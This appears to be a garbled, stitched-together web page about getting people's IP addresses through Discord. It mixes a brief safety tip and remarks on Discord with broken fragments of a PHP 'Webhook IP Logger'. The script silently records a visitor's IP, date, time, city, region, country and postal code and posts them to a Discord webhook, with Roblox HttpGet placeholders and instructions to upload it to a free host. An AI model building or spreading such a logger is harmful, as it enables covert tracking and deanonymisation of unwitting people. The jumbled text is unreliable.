It is advisable only to accept a friend request from people you know for safety on the site. One of these platforms is Discord, a chat app with almost similar characteristics as skype and TeamSpeak.ĭiscord has many benefits, such as because you can use it to create a server for free, and it also doesn't contain ads you can also chat with whoever you want using this platform. There are currently dozens of social media platforms where people interact both socially and professionally. Here are four methods you can use to get an IP address using Discord. Logging.basicConfig(level=logging.Did you know you can get someone’s IP address from Discord? In a sense, this is nothing new. game:HttpGet("Site Here") game:GetService("HttpService"):GetAsync("Site Here") game:HttpGet("")``` =THIS OUTPUTS THE CHANNEL SET BY THE WEBHOOK =\\Ī bug arose when the API I used stop showing the info for IP's. =CURL OPTIONS FOR POSTING THE INFORMATION PROVIDED ABOVE =\\Ĭurl_setopt( $ch, CURLOPT_POSTFIELDS, $make_json) Ĭurl_setopt( $ch, CURLOPT_FOLLOWLOCATION, 1) Ĭurl_setopt( $ch, CURLOPT_RETURNTRANSFER, 1) $json_data = array ('content'=>"$data", 'username'=>"New Visitor From $details->country", 'avatar_url'=> "$flag")

$data = "**User IP:** $ip\n**Date:** $TheirDate\n**Time:** $TheirTime \n**Location:** $details->city \n**Region:** $details->region\n**Country** $details->country\n**Postal Code:** $details->zip" How do you make an IP Logger DiscordPHP Webhook Game:GetService("HttpService"):GetAsync("Site Here") $ url = "Your Discord Webhook Link Here" Webhook-IP-Logger $ Drag the PHP To your Host (You Can do it in 000webhost), How do you make an IP Logger DiscordPHP Webhook.